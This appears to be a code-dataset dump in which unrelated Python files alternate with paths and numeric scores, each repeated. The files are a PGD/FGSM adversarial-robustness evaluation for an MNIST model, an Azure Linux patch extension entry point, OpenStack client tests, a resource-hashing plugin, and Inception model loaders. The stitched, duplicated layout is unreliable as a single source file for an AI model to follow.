delta.grad.zero_()
all_loss = F.cross_entropy(model(X+delta), y, reduction='none')
max_delta[all_loss >= max_loss] = delta.detach()[all_loss >= max_loss]
max_loss = torch.max(max_loss, all_loss)
return max_delta
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('--batch-size', default=100, type=int)
parser.add_argument('--data-dir', default='../mnist-data', type=str)
parser.add_argument('--fname', type=str)
parser.add_argument('--attack', default='pgd', type=str, choices=['pgd', 'fgsm', 'none'])
parser.add_argument('--epsilon', default=0.3, type=float)
parser.add_argument('--attack-iters', default=50, type=int)
parser.add_argument('--alpha', default=1e-2, type=float)
parser.add_argument('--restarts', default=10, type=int)
parser.add_argument('--seed', default=0, type=int)
return parser.parse_args()
def main():
args = get_args()
logger.info(args)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
torch.cuda.manual_seed(args.seed)
mnist_test = datasets.MNIST("../mnist-data", train=False, download=True, transform=transforms.ToTensor())
test_loader = torch.utils.data.DataLoader(mnist_test, batch_size=args.batch_size, shuffle=False)
model = mnist_net().cuda()
checkpoint = torch.load(args.fname)
model.load_state_dict(checkpoint)
model.eval()
total_loss = 0
total_acc = 0
n = 0
if args.attack == 'none':
with torch.no_grad():
for i, (X, y) in enumerate(test_loader):
X, y = X.cuda(), y.cuda()
output = model(X)
loss = F.cross_entropy(output, y)
total_loss += loss.item() * y.size(0)
total_acc += (output.max(1)[1] == y).sum().item()
n += y.size(0)
else:
for i, (X, y) in enumerate(test_loader):
X, y = X.cuda(), y.cuda()
if args.attack == 'pgd':
delta = attack_pgd(model, X, y, args.epsilon, args.alpha, args.attack_iters, args.restarts)
elif args.attack == 'fgsm':
delta = attack_fgsm(model, X, y, args.epsilon)
with torch.no_grad():
output = model(X + delta)
loss = F.cross_entropy(output, y)
total_loss += loss.item() * y.size(0)
total_acc += (output.max(1)[1] == y).sum().item()
n += y.size(0)
logger.info('Test Loss: %.4f, Acc: %.4f', total_loss/n, total_acc/n)
if __name__ == "__main__":
main() | 0.57523 | 0.431105 |
import datetime
import os
import sys
from extension.src.ActionHandler import ActionHandler
from extension.src.EnvLayer import EnvLayer
from extension.src.EnvHealthManager import EnvHealthManager
from extension.src.RuntimeContextHandler import RuntimeContextHandler
from extension.src.TelemetryWriter import TelemetryWriter
from extension.src.file_handlers.JsonFileHandler import JsonFileHandler
from extension.src.file_handlers.CoreStateHandler import CoreStateHandler
from extension.src.file_handlers.ExtConfigSettingsHandler import ExtConfigSettingsHandler
from extension.src.file_handlers.ExtEnvHandler import ExtEnvHandler
from extension.src.file_handlers.ExtOutputStatusHandler import ExtOutputStatusHandler
from extension.src.file_handlers.ExtStateHandler import ExtStateHandler
from extension.src.local_loggers.Logger import Logger
from extension.src.ProcessHandler import ProcessHandler
from extension.src.Utility import Utility
from extension.src.Constants import Constants
def main(argv):
stdout_file_mirror = None
file_logger = None
logger = Logger()
telemetry_writer = TelemetryWriter(logger)
logger.telemetry_writer = telemetry_writer # Need to set telemetry_writer within logger to enable sending all logs to telemetry
try:
# initializing action handler
# args will have values install, uninstall, etc, as given in MsftLinuxPatchExtShim.sh in the operation var
cmd_exec_start_time = datetime.datetime.utcnow()
utility = Utility(logger)
runtime_context_handler = RuntimeContextHandler(logger)
json_file_handler = JsonFileHandler(logger)
ext_env_handler = ExtEnvHandler(json_file_handler)
env_layer = EnvLayer()
env_health_manager = EnvHealthManager(env_layer)
if ext_env_handler.handler_environment_json is not None and ext_env_handler.config_folder is not None:
config_folder = ext_env_handler.config_folder
if config_folder is None or not os.path.exists(config_folder):
logger.log_error("Config folder not found at [{0}].".format(repr(config_folder)))
exit(Constants.ExitCode.MissingConfig)
ext_config_settings_handler = ExtConfigSettingsHandler(logger, json_file_handler, config_folder)
core_state_handler = CoreStateHandler(config_folder, json_file_handler)
ext_state_handler = ExtStateHandler(config_folder, utility, json_file_handler)
ext_output_status_handler = ExtOutputStatusHandler(logger, utility, json_file_handler, ext_env_handler.status_folder)
process_handler = ProcessHandler(logger, env_layer, ext_output_status_handler)
action_handler = ActionHandler(logger, env_layer, telemetry_writer, utility, runtime_context_handler, json_file_handler, env_health_manager, ext_env_handler, ext_config_settings_handler, core_state_handler, ext_state_handler, ext_output_status_handler, process_handler, cmd_exec_start_time)
action_handler.determine_operation(argv[1])
else:
error_cause = "No configuration provided in HandlerEnvironment" if ext_env_handler.handler_environment_json is None else "Path to config folder not specified in HandlerEnvironment"
error_msg = "Error processing file. [File={0}] [Error={1}]".format(Constants.HANDLER_ENVIRONMENT_FILE, error_cause)
raise Exception(error_msg)
except Exception as error:
logger.log_error(repr(error))
return Constants.ExitCode.HandlerFailed
finally:
if stdout_file_mirror is not None:
stdout_file_mirror.stop()
if file_logger is not None:
file_logger.close()
if __name__ == '__main__':
main(sys.argv) | src/extension/src/__main__.py |
import datetime
import os
import sys
from extension.src.ActionHandler import ActionHandler
from extension.src.EnvLayer import EnvLayer
from extension.src.EnvHealthManager import EnvHealthManager
from extension.src.RuntimeContextHandler import RuntimeContextHandler
from extension.src.TelemetryWriter import TelemetryWriter
from extension.src.file_handlers.JsonFileHandler import JsonFileHandler
from extension.src.file_handlers.CoreStateHandler import CoreStateHandler
from extension.src.file_handlers.ExtConfigSettingsHandler import ExtConfigSettingsHandler
from extension.src.file_handlers.ExtEnvHandler import ExtEnvHandler
from extension.src.file_handlers.ExtOutputStatusHandler import ExtOutputStatusHandler
from extension.src.file_handlers.ExtStateHandler import ExtStateHandler
from extension.src.local_loggers.Logger import Logger
from extension.src.ProcessHandler import ProcessHandler
from extension.src.Utility import Utility
from extension.src.Constants import Constants
def main(argv):
stdout_file_mirror = None
file_logger = None
logger = Logger()
telemetry_writer = TelemetryWriter(logger)
logger.telemetry_writer = telemetry_writer # Need to set telemetry_writer within logger to enable sending all logs to telemetry
try:
# initializing action handler
# args will have values install, uninstall, etc, as given in MsftLinuxPatchExtShim.sh in the operation var
cmd_exec_start_time = datetime.datetime.utcnow()
utility = Utility(logger)
runtime_context_handler = RuntimeContextHandler(logger)
json_file_handler = JsonFileHandler(logger)
ext_env_handler = ExtEnvHandler(json_file_handler)
env_layer = EnvLayer()
env_health_manager = EnvHealthManager(env_layer)
if ext_env_handler.handler_environment_json is not None and ext_env_handler.config_folder is not None:
config_folder = ext_env_handler.config_folder
if config_folder is None or not os.path.exists(config_folder):
logger.log_error("Config folder not found at [{0}].".format(repr(config_folder)))
exit(Constants.ExitCode.MissingConfig)
ext_config_settings_handler = ExtConfigSettingsHandler(logger, json_file_handler, config_folder)
core_state_handler = CoreStateHandler(config_folder, json_file_handler)
ext_state_handler = ExtStateHandler(config_folder, utility, json_file_handler)
ext_output_status_handler = ExtOutputStatusHandler(logger, utility, json_file_handler, ext_env_handler.status_folder)
process_handler = ProcessHandler(logger, env_layer, ext_output_status_handler)
action_handler = ActionHandler(logger, env_layer, telemetry_writer, utility, runtime_context_handler, json_file_handler, env_health_manager, ext_env_handler, ext_config_settings_handler, core_state_handler, ext_state_handler, ext_output_status_handler, process_handler, cmd_exec_start_time)
action_handler.determine_operation(argv[1])
else:
error_cause = "No configuration provided in HandlerEnvironment" if ext_env_handler.handler_environment_json is None else "Path to config folder not specified in HandlerEnvironment"
error_msg = "Error processing file. [File={0}] [Error={1}]".format(Constants.HANDLER_ENVIRONMENT_FILE, error_cause)
raise Exception(error_msg)
except Exception as error:
logger.log_error(repr(error))
return Constants.ExitCode.HandlerFailed
finally:
if stdout_file_mirror is not None:
stdout_file_mirror.stop()
if file_logger is not None:
file_logger.close()
if __name__ == '__main__':
main(sys.argv) | 0.285571 | 0.041269 |
from unittest import mock
from openstackclient.common import module as osc_module
from openstackclient.tests.unit import fakes
from openstackclient.tests.unit import utils
# NOTE(dtroyer): module_1 must match the version list filter (not --all)
# currently == '*client*'
module_name_1 = 'fakeclient'
module_version_1 = '0.1.2'
module_name_2 = 'zlib'
module_version_2 = '1.1'
# module_3 match openstacksdk
module_name_3 = 'openstack'
module_version_3 = '0.9.13'
# module_4 match sub module of fakeclient
module_name_4 = 'fakeclient.submodule'
module_version_4 = '0.2.2'
# module_5 match private module
module_name_5 = '_private_module.lib'
module_version_5 = '0.0.1'
MODULES = {
module_name_1: fakes.FakeModule(module_name_1, module_version_1),
module_name_2: fakes.FakeModule(module_name_2, module_version_2),
module_name_3: fakes.FakeModule(module_name_3, module_version_3),
module_name_4: fakes.FakeModule(module_name_4, module_version_4),
module_name_5: fakes.FakeModule(module_name_5, module_version_5),
}
class TestCommandList(utils.TestCommand):
def setUp(self):
super(TestCommandList, self).setUp()
self.app.command_manager = mock.Mock()
self.app.command_manager.get_command_groups.return_value = [
'openstack.common'
]
self.app.command_manager.get_command_names.return_value = [
'limits show\nextension list'
]
# Get the command object to test
self.cmd = osc_module.ListCommand(self.app, None)
def test_command_list_no_options(self):
arglist = []
verifylist = []
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# In base command class Lister in cliff, abstract method take_action()
# returns a tuple containing the column names and an iterable
# containing the data to be listed.
columns, data = self.cmd.take_action(parsed_args)
# TODO(bapalm): Adjust this when cliff properly supports
# handling the detection rather than using the hard-code below.
collist = ('Command Group', 'Commands')
self.assertEqual(collist, columns)
datalist = ((
'openstack.common',
'limits show\nextension list'
),)
self.assertEqual(datalist, tuple(data))
def test_command_list_with_group_not_found(self):
arglist = [
'--group', 'not_exist',
]
verifylist = [
('group', 'not_exist'),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
columns, data = self.cmd.take_action(parsed_args)
collist = ('Command Group', 'Commands')
self.assertEqual(collist, columns)
self.assertEqual([], data)
def test_command_list_with_group(self):
arglist = [
'--group', 'common',
]
verifylist = [
('group', 'common'),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
columns, data = self.cmd.take_action(parsed_args)
collist = ('Command Group', 'Commands')
self.assertEqual(collist, columns)
datalist = ((
'openstack.common',
'limits show\nextension list'
),)
self.assertEqual(datalist, tuple(data))
@mock.patch.dict(
'openstackclient.common.module.sys.modules',
values=MODULES,
clear=True,
)
class TestModuleList(utils.TestCommand):
def setUp(self):
super(TestModuleList, self).setUp()
# Get the command object to test
self.cmd = osc_module.ListModule(self.app, None)
def test_module_list_no_options(self):
arglist = []
verifylist = [
('all', False),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# In base command class Lister in cliff, abstract method take_action()
# returns a tuple containing the column names and an iterable
# containing the data to be listed.
columns, data = self.cmd.take_action(parsed_args)
# Output xxxclient and openstacksdk, but not regular module, like: zlib
self.assertIn(module_name_1, columns)
self.assertIn(module_version_1, data)
self.assertNotIn(module_name_2, columns)
self.assertNotIn(module_version_2, data)
self.assertIn(module_name_3, columns)
self.assertIn(module_version_3, data)
# Filter sub and private modules
self.assertNotIn(module_name_4, columns)
self.assertNotIn(module_version_4, data)
self.assertNotIn(module_name_5, columns)
self.assertNotIn(module_version_5, data)
def test_module_list_all(self):
arglist = [
'--all',
]
verifylist = [
('all', True),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# In base command class Lister in cliff, abstract method take_action()
# returns a tuple containing the column names and an iterable
# containing the data to be listed.
columns, data = self.cmd.take_action(parsed_args)
# Output xxxclient, openstacksdk and regular module, like: zlib
self.assertIn(module_name_1, columns)
self.assertIn(module_version_1, data)
self.assertIn(module_name_2, columns)
self.assertIn(module_version_2, data)
self.assertIn(module_name_3, columns)
self.assertIn(module_version_3, data)
# Filter sub and private modules
self.assertNotIn(module_name_4, columns)
self.assertNotIn(module_version_4, data)
self.assertNotIn(module_name_5, columns)
self.assertNotIn(module_version_5, data) | openstackclient/tests/unit/common/test_module.py | from unittest import mock
from openstackclient.common import module as osc_module
from openstackclient.tests.unit import fakes
from openstackclient.tests.unit import utils
# NOTE(dtroyer): module_1 must match the version list filter (not --all)
# currently == '*client*'
module_name_1 = 'fakeclient'
module_version_1 = '0.1.2'
module_name_2 = 'zlib'
module_version_2 = '1.1'
# module_3 match openstacksdk
module_name_3 = 'openstack'
module_version_3 = '0.9.13'
# module_4 match sub module of fakeclient
module_name_4 = 'fakeclient.submodule'
module_version_4 = '0.2.2'
# module_5 match private module
module_name_5 = '_private_module.lib'
module_version_5 = '0.0.1'
MODULES = {
module_name_1: fakes.FakeModule(module_name_1, module_version_1),
module_name_2: fakes.FakeModule(module_name_2, module_version_2),
module_name_3: fakes.FakeModule(module_name_3, module_version_3),
module_name_4: fakes.FakeModule(module_name_4, module_version_4),
module_name_5: fakes.FakeModule(module_name_5, module_version_5),
}
class TestCommandList(utils.TestCommand):
def setUp(self):
super(TestCommandList, self).setUp()
self.app.command_manager = mock.Mock()
self.app.command_manager.get_command_groups.return_value = [
'openstack.common'
]
self.app.command_manager.get_command_names.return_value = [
'limits show\nextension list'
]
# Get the command object to test
self.cmd = osc_module.ListCommand(self.app, None)
def test_command_list_no_options(self):
arglist = []
verifylist = []
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# In base command class Lister in cliff, abstract method take_action()
# returns a tuple containing the column names and an iterable
# containing the data to be listed.
columns, data = self.cmd.take_action(parsed_args)
# TODO(bapalm): Adjust this when cliff properly supports
# handling the detection rather than using the hard-code below.
collist = ('Command Group', 'Commands')
self.assertEqual(collist, columns)
datalist = ((
'openstack.common',
'limits show\nextension list'
),)
self.assertEqual(datalist, tuple(data))
def test_command_list_with_group_not_found(self):
arglist = [
'--group', 'not_exist',
]
verifylist = [
('group', 'not_exist'),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
columns, data = self.cmd.take_action(parsed_args)
collist = ('Command Group', 'Commands')
self.assertEqual(collist, columns)
self.assertEqual([], data)
def test_command_list_with_group(self):
arglist = [
'--group', 'common',
]
verifylist = [
('group', 'common'),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
columns, data = self.cmd.take_action(parsed_args)
collist = ('Command Group', 'Commands')
self.assertEqual(collist, columns)
datalist = ((
'openstack.common',
'limits show\nextension list'
),)
self.assertEqual(datalist, tuple(data))
@mock.patch.dict(
'openstackclient.common.module.sys.modules',
values=MODULES,
clear=True,
)
class TestModuleList(utils.TestCommand):
def setUp(self):
super(TestModuleList, self).setUp()
# Get the command object to test
self.cmd = osc_module.ListModule(self.app, None)
def test_module_list_no_options(self):
arglist = []
verifylist = [
('all', False),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# In base command class Lister in cliff, abstract method take_action()
# returns a tuple containing the column names and an iterable
# containing the data to be listed.
columns, data = self.cmd.take_action(parsed_args)
# Output xxxclient and openstacksdk, but not regular module, like: zlib
self.assertIn(module_name_1, columns)
self.assertIn(module_version_1, data)
self.assertNotIn(module_name_2, columns)
self.assertNotIn(module_version_2, data)
self.assertIn(module_name_3, columns)
self.assertIn(module_version_3, data)
# Filter sub and private modules
self.assertNotIn(module_name_4, columns)
self.assertNotIn(module_version_4, data)
self.assertNotIn(module_name_5, columns)
self.assertNotIn(module_version_5, data)
def test_module_list_all(self):
arglist = [
'--all',
]
verifylist = [
('all', True),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# In base command class Lister in cliff, abstract method take_action()
# returns a tuple containing the column names and an iterable
# containing the data to be listed.
columns, data = self.cmd.take_action(parsed_args)
# Output xxxclient, openstacksdk and regular module, like: zlib
self.assertIn(module_name_1, columns)
self.assertIn(module_version_1, data)
self.assertIn(module_name_2, columns)
self.assertIn(module_version_2, data)
self.assertIn(module_name_3, columns)
self.assertIn(module_version_3, data)
# Filter sub and private modules
self.assertNotIn(module_name_4, columns)
self.assertNotIn(module_version_4, data)
self.assertNotIn(module_name_5, columns)
self.assertNotIn(module_version_5, data) | 0.487795 | 0.336944 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
__author__ = "d01"
__email__ = "<EMAIL>"
__copyright__ = "Copyright (C) 2016, <NAME>"
__license__ = "MIT"
__version__ = "0.1.0"
__date__ = "2016-04-01"
# Created: 2016-03-27 15:12
import hashlib
from abc import ABCMeta
import threading
import os
import datetime
from paps.crowd import Plugin, PluginException
def get_file_hash(file_path, block_size=1024, hasher=None):
"""
Generate hash for given file
:param file_path: Path to file
:type file_path: str
:param block_size: Size of block to be read at once (default: 1024)
:type block_size: int
:param hasher: Use specific hasher, defaults to md5 (default: None)
:type hasher: _hashlib.HASH
:return: Hash of file
:rtype: str
"""
if hasher is None:
hasher = hashlib.md5()
with open(file_path, 'rb') as f:
while True:
buffer = f.read(block_size)
if len(buffer) <= 0:
break
hasher.update(buffer)
return hasher.hexdigest()
class SettablePlugin(Plugin):
"""
Abstract interface for plugin which can use the settings plugin
"""
__metaclass__ = ABCMeta
def __init__(self, settings=None):
"""
Initialize object
:param settings: Settings to be passed for init (default: None)
:type settings: dict | None
:rtype: None
:raises TypeError: Controller missing
"""
if settings is None:
settings = {}
super(SettablePlugin, self).__init__(settings)
self._resource_path = settings.get('resource_path')
""" Path to the resource dir
:type _resource_path: str """
self._resource_file_types = settings.get(
'resource_file_types',
["html", "js", "css"]
)
""" List of acceptable file types (lower case)
:type _resource_file_types: list[str] """
self._resource_file_types = [
s.lower() for s in self._resource_file_types
]
self._resources = {}
""" Inventory of resources
:type _resources: dict[str, dict[str, str | datetime.datetime] """
self._resource_lock = threading.RLock()
""" Lock to sync access to _resources
:type _resource_lock: threading.RLock """
def on_config(self, settings):
"""
Change the settings for the plugin (implement if supported)
:param settings: Settings to update current ones
:type settings: dict
:rtype: None
"""
raise NotImplementedError("Please implement")
def get_data(self):
"""
Get current data of this plugin for frontend (or empty dict if nothing)
(settings, etc.)
:return: Data
:rtype: dict
"""
return {}
def get_info(self):
"""
Get information about this plugin for frontend
(e.g. printable name, description, ..)
:return: Information
:rtype: dict
"""
return {
'name': self.name
}
def resource_get_list(self):
"""
Get list of this plugins resources and a hash to check for file changes
(It is recommended to keep a in memory representation of this struct
and not to generate it upon each request)
:return: List of supported resources and hashes
:rtype: list[(unicode, unicode)]
"""
if not self._resources:
return self.resource_update_list()
res = []
with self._resource_lock:
for key in self._resources:
res.append((key, self._resources[key]['hash']))
return res
def resource_update_list(self, reset=False):
"""
Update internal struct of resource, hash list and get diff
(Warning: Resource names have to be unique!!)
:param reset: Should resources be rebuild from scratch (default: False)
:type reset: bool
:return: List of resources and hashes that changed
:rtype: list[(unicode, unicode)]
"""
if not self._resource_path:
raise PluginException("No resource path set")
if not os.path.isdir(self._resource_path):
raise PluginException(
u"Resource path directory '{}' not found".format(
self._resource_path
)
)
res = []
with self._resource_lock:
if reset:
self._resources = {}
old = dict(self._resources)
for dirname, dirnames, filenames in os.walk(self._resource_path):
for file_name in filenames:
file_ext = os.path.splitext(file_name)[1].lower()[1:]
if file_ext not in self._resource_file_types:
self.debug(u"Skipping '{}'".format(file_name))
continue
file_path = os.path.join(dirname, file_name)
try:
file_hash = get_file_hash(file_path)
except:
self.exception(
u"Failed to hash '{}'".format(file_path)
)
continue
self._resources[file_name] = {
'name': file_name,
'path': file_path,
'hash': file_hash,
'checked': datetime.datetime.utcnow()
}
# generate diff
for key in self._resources:
resource = self._resources[key]
if key not in old or old[key]['hash'] != resource['hash']:
# new file or hash changed
res.append((key, resource['hash']))
return res
def resource_get(self, resource_name):
"""
Return resource info
:param resource_name: Resource name as returned by resource_get_list()
:type resource_name: str
:return: Resource information (empty if not found)
name: Resource name
hash: Resource hash
path: Path to resource
checked: Last time information was updated
:rtype: dict[str, str]
"""
try:
with self._resource_lock:
res = self._resources[resource_name]
except KeyError:
return {}
return res | paps_settings/settable_plugin.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
__author__ = "d01"
__email__ = "<EMAIL>"
__copyright__ = "Copyright (C) 2016, <NAME>"
__license__ = "MIT"
__version__ = "0.1.0"
__date__ = "2016-04-01"
# Created: 2016-03-27 15:12
import hashlib
from abc import ABCMeta
import threading
import os
import datetime
from paps.crowd import Plugin, PluginException
def get_file_hash(file_path, block_size=1024, hasher=None):
"""
Generate hash for given file
:param file_path: Path to file
:type file_path: str
:param block_size: Size of block to be read at once (default: 1024)
:type block_size: int
:param hasher: Use specific hasher, defaults to md5 (default: None)
:type hasher: _hashlib.HASH
:return: Hash of file
:rtype: str
"""
if hasher is None:
hasher = hashlib.md5()
with open(file_path, 'rb') as f:
while True:
buffer = f.read(block_size)
if len(buffer) <= 0:
break
hasher.update(buffer)
return hasher.hexdigest()
class SettablePlugin(Plugin):
"""
Abstract interface for plugin which can use the settings plugin
"""
__metaclass__ = ABCMeta
def __init__(self, settings=None):
"""
Initialize object
:param settings: Settings to be passed for init (default: None)
:type settings: dict | None
:rtype: None
:raises TypeError: Controller missing
"""
if settings is None:
settings = {}
super(SettablePlugin, self).__init__(settings)
self._resource_path = settings.get('resource_path')
""" Path to the resource dir
:type _resource_path: str """
self._resource_file_types = settings.get(
'resource_file_types',
["html", "js", "css"]
)
""" List of acceptable file types (lower case)
:type _resource_file_types: list[str] """
self._resource_file_types = [
s.lower() for s in self._resource_file_types
]
self._resources = {}
""" Inventory of resources
:type _resources: dict[str, dict[str, str | datetime.datetime] """
self._resource_lock = threading.RLock()
""" Lock to sync access to _resources
:type _resource_lock: threading.RLock """
def on_config(self, settings):
"""
Change the settings for the plugin (implement if supported)
:param settings: Settings to update current ones
:type settings: dict
:rtype: None
"""
raise NotImplementedError("Please implement")
def get_data(self):
"""
Get current data of this plugin for frontend (or empty dict if nothing)
(settings, etc.)
:return: Data
:rtype: dict
"""
return {}
def get_info(self):
"""
Get information about this plugin for frontend
(e.g. printable name, description, ..)
:return: Information
:rtype: dict
"""
return {
'name': self.name
}
def resource_get_list(self):
"""
Get list of this plugins resources and a hash to check for file changes
(It is recommended to keep a in memory representation of this struct
and not to generate it upon each request)
:return: List of supported resources and hashes
:rtype: list[(unicode, unicode)]
"""
if not self._resources:
return self.resource_update_list()
res = []
with self._resource_lock:
for key in self._resources:
res.append((key, self._resources[key]['hash']))
return res
def resource_update_list(self, reset=False):
"""
Update internal struct of resource, hash list and get diff
(Warning: Resource names have to be unique!!)
:param reset: Should resources be rebuild from scratch (default: False)
:type reset: bool
:return: List of resources and hashes that changed
:rtype: list[(unicode, unicode)]
"""
if not self._resource_path:
raise PluginException("No resource path set")
if not os.path.isdir(self._resource_path):
raise PluginException(
u"Resource path directory '{}' not found".format(
self._resource_path
)
)
res = []
with self._resource_lock:
if reset:
self._resources = {}
old = dict(self._resources)
for dirname, dirnames, filenames in os.walk(self._resource_path):
for file_name in filenames:
file_ext = os.path.splitext(file_name)[1].lower()[1:]
if file_ext not in self._resource_file_types:
self.debug(u"Skipping '{}'".format(file_name))
continue
file_path = os.path.join(dirname, file_name)
try:
file_hash = get_file_hash(file_path)
except:
self.exception(
u"Failed to hash '{}'".format(file_path)
)
continue
self._resources[file_name] = {
'name': file_name,
'path': file_path,
'hash': file_hash,
'checked': datetime.datetime.utcnow()
}
# generate diff
for key in self._resources:
resource = self._resources[key]
if key not in old or old[key]['hash'] != resource['hash']:
# new file or hash changed
res.append((key, resource['hash']))
return res
def resource_get(self, resource_name):
"""
Return resource info
:param resource_name: Resource name as returned by resource_get_list()
:type resource_name: str
:return: Resource information (empty if not found)
name: Resource name
hash: Resource hash
path: Path to resource
checked: Last time information was updated
:rtype: dict[str, str]
"""
try:
with self._resource_lock:
res = self._resources[resource_name]
except KeyError:
return {}
return res | 0.678007 | 0.081923 |
import numpy as np
from PuzzleLib.Backend import gpuarray
from PuzzleLib.Containers.Sequential import Sequential
from PuzzleLib.Containers.Parallel import Parallel
from PuzzleLib.Modules.Conv2D import Conv2D
from PuzzleLib.Modules.BatchNorm2D import BatchNorm2D
from PuzzleLib.Modules.Activation import Activation, relu
from PuzzleLib.Modules.MaxPool2D import MaxPool2D
from PuzzleLib.Modules.AvgPool2D import AvgPool2D
from PuzzleLib.Modules.Flatten import Flatten
from PuzzleLib.Modules.Linear import Linear
from PuzzleLib.Modules.SoftMax import SoftMax
from PuzzleLib.Modules.Replicate import Replicate
from PuzzleLib.Modules.Concat import Concat
from PuzzleLib.Modules.ToList import ToList
def loadInceptionBN(modelpath, actInplace=False, bnInplace=False, initscheme="none", name="Inception-BN-0126"):
net = Sequential(name=name)
net.append(Conv2D(3, 64, 7, stride=2, pad=3, useBias=False, initscheme=initscheme, name="conv_1"))
net.append(BatchNorm2D(64, inplace=bnInplace, name="bn_1"))
net.append(Activation(relu, inplace=actInplace, name="relu_1"))
net.append(MaxPool2D(3, 2, pad=1, name="pool_1"))
net.append(Conv2D(64, 64, 1, useBias=False, initscheme=initscheme, name="conv_2_red"))
net.append(BatchNorm2D(64, inplace=bnInplace, name="bn_2_red"))
net.append(Activation(relu, inplace=actInplace, name="relu_2_red"))
net.append(Conv2D(64, 192, 3, pad=1, useBias=False, initscheme=initscheme, name="conv_2"))
net.append(BatchNorm2D(192, inplace=bnInplace, name="bn_2"))
net.append(Activation(relu, inplace=actInplace, name="relu_2"))
net.append(MaxPool2D(3, 2, pad=1, name="pool_2"))
act, bn = actInplace, bnInplace
net.extend(bnBlock(192, [64], [64, 64], [64, 96, 96], [32], act=act, bn=bn, scheme=initscheme, name="3a"))
net.extend(bnBlock(256, [64], [64, 96], [64, 96, 96], [64], act=act, bn=bn, scheme=initscheme, name="3b"))
net.extend(bnShrinkBlock(320, [128, 160], [64, 96, 96], bn=bn, act=act, scheme=initscheme, name="3c"))
net.extend(bnBlock(576, [224], [64, 96], [96, 128, 128], [128], act=act, bn=bn, scheme=initscheme, name="4a"))
net.extend(bnBlock(576, [192], [96, 128], [96, 128, 128], [128], act=act, bn=bn, scheme=initscheme, name="4b"))
net.extend(bnBlock(576, [160], [128, 160], [128, 160, 160], [128], act=act,bn=bn, scheme=initscheme, name="4c"))
net.extend(bnBlock(608, [96], [128,192], [160, 192, 192], [128], act=act, bn=bn, scheme=initscheme, name="4d"))
net.extend(bnShrinkBlock(608, [128, 192], [192, 256, 256], act=act, bn=bn, scheme=initscheme, name="4e"))
net.extend(bnBlock(1056, [352], [192, 320], [160,224,224], [128], act=act, bn=bn, scheme=initscheme, name="5a"))
net.extend(bnBlock(1024, [352], [192, 320], [192,224,224], [128], act=act, bn=bn, scheme=initscheme, name="5b"))
net.append(AvgPool2D(7, 1, name="global_pool"))
net.append(Flatten(name="flatten"))
net.append(Linear(1024, 1000, initscheme=initscheme, name="fc1"))
net.append(SoftMax(name="softmax"))
if modelpath is not None:
net.load(modelpath, assumeUniqueNames=True)
return net
def loadInceptionV3(modelpath, actInplace=False, bnInplace=False, initscheme="none", name="Inception-7-0001"):
net = Sequential(name=name)
net.append(Conv2D(3, 32, 3, stride=2, useBias=False, initscheme=initscheme, name="conv_conv2d"))
net.append(BatchNorm2D(32, name="conv_batchnorm"))
net.append(Activation(relu, inplace=actInplace, name="conv_relu"))
net.append(Conv2D(32, 32, 3, useBias=False, initscheme=initscheme, name="conv_1_conv2d"))
net.append(BatchNorm2D(32, name="conv_1_batchnorm"))
net.append(Activation(relu, inplace=actInplace, name="conv_1_relu"))
net.append(Conv2D(32, 64, 3, pad=1, useBias=False, initscheme=initscheme, name="conv_2_conv2d"))
net.append(BatchNorm2D(64, name="conv_2_batchnorm"))
net.append(Activation(relu, inplace=actInplace, name="conv_2_relu"))
net.append(MaxPool2D(3, 2, name="pool"))
net.append(Conv2D(64, 80, 1, useBias=False, initscheme=initscheme, name="conv_3_conv2d"))
net.append(BatchNorm2D(80, name="conv_3_batchnorm"))
net.append(Activation(relu, inplace=actInplace, name="conv_3_relu"))
net.append(Conv2D(80, 192, 3, useBias=False, initscheme=initscheme, name="conv_4_conv2d"))
net.append(BatchNorm2D(192, name="conv_4_batchnorm"))
net.append(Activation(relu, inplace=actInplace, name="conv_4_relu"))
net.append(MaxPool2D(3, 2, name="pool1"))
act, bn = actInplace, bnInplace
net.extend(bnBlock(192, [64], [48, 64], [64, 96, 96], [32], "mixed", act, bn, initscheme, 5, 2, "v3"))
net.extend(bnBlock(256, [64], [48, 64], [64, 96, 96], [64], "mixed_1", act, bn, initscheme, 5, 2, "v3"))
net.extend(bnBlock(288, [64], [48, 64], [64, 96, 96], [64], "mixed_2", act, bn, initscheme, 5, 2, "v3"))
net.extend(bnShrinkBlock(288, [384], [64, 96, 96], "mixed_3", act, bn, initscheme, False, 0, "v3"))
net.extend(factorBlock(768, [192], [128, 128, 192], [128,128,128,128,192], [192], "mixed_4", act, bn, initscheme))
net.extend(factorBlock(768, [192], [160, 160, 192], [160,160,160,160,192], [192], "mixed_5", act, bn, initscheme))
net.extend(factorBlock(768, [192], [160, 160, 192], [160,160,160,160,192], [192], "mixed_6", act, bn, initscheme))
net.extend(factorBlock(768, [192], [192, 192, 192], [192,192,192,192,192], [192], "mixed_7", act, bn, initscheme))
net.extend(v3ShrinkBlock(768, [192, 320], [192, 192, 192, 192], "mixed_8", act, bn, initscheme))
net.extend(expandBlock(
1280, [320], [384, 384, 384], [448, 384, 384, 384], [192], "mixed_9", act, bn, initscheme, pool="avg"
))
net.extend(expandBlock(
2048, [320], [384, 384, 384], [448, 384, 384, 384], [192], "mixed_10", act, bn, initscheme, pool="max"
))
net.append(AvgPool2D(8, 1, name="global_pool"))
net.append(Flatten(name="flatten"))
net.append(Linear(2048, 1008, name="fc1"))
net.append(SoftMax(name="softmax"))
if modelpath is not None:
net.load(modelpath, assumeUniqueNames=True)
return net
def convBN(inmaps, outmaps, size, stride, pad, name, actInplace, bnInplace, scheme, typ="bn"):
block = Sequential()
if typ == "bn":
names = ["conv_%s" % name, "bn_%s" % name, "relu_%s" % name]
elif typ == "v3":
names = ["%s_conv2d" % name, "%s_batchnorm" % name, "%s_relu" % name]
else:
raise ValueError("Unrecognized convBN type")
block.append(Conv2D(inmaps, outmaps, size, stride, pad, useBias=False, initscheme=scheme, name=names[0]))
